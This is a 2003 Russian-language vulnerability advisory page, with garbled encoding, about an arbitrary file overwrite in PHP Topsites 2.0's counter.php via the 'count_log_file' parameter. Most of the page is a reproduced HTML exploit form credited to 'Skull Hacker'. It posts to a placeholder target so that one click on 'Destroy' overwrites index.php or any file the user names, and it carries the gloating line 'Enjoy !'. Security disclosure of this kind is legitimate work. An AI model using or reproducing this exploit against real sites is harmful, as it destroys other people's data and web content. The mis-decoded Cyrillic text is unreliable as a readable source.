»зменение произвольных файлов в PHP Topsites

ƒата публикации:
27.03.2003
¬сего просмотров:
948
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: ”€звимость обнаружена в PHP Topsites. ”даленный пользователь может измен€ть произвольные файлы на сервере.

”даленный пользователь может, по сообщени€м, представить произвольное им€ файла дл€ переменной 'count_log_file', чтобы заставить сценарий counter.php перезаписать произвольный файл. Ёксплоит:


<HTML>

<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull 
Hacker</TITLE>
</HEAD>

<BODY>

<P><B><FONT FACE="Arial">PHP
Topsites 2.0 Remote Destroy Exploit
- Discovered By Skull Hacker
<FONT SIZE="1">
<A HREF="mailto:skull_hacker@hackersof2000.net">
skull_hacker@hackersof2000.net</A>
.<BR>
<BR>
</FONT><FONT SIZE="2">Click
destroy and the Topsites will then be
fully erased and replaced with
numbers. Enjoy ! note: Change the count_log_file=index.php too any file u 
want too overwrite on the server.<BR>
</FONT></FONT></B></P>
<FORM METHOD="POST" 
ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php">

<INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P>
</FORM>

</BODY>

</HTML>
”€звимость обнаружена в PHP Topsites 2.0

—сылки: PHP TopSites 2.0 Remote Destroy Exploit
или введите им€

CAPTCHA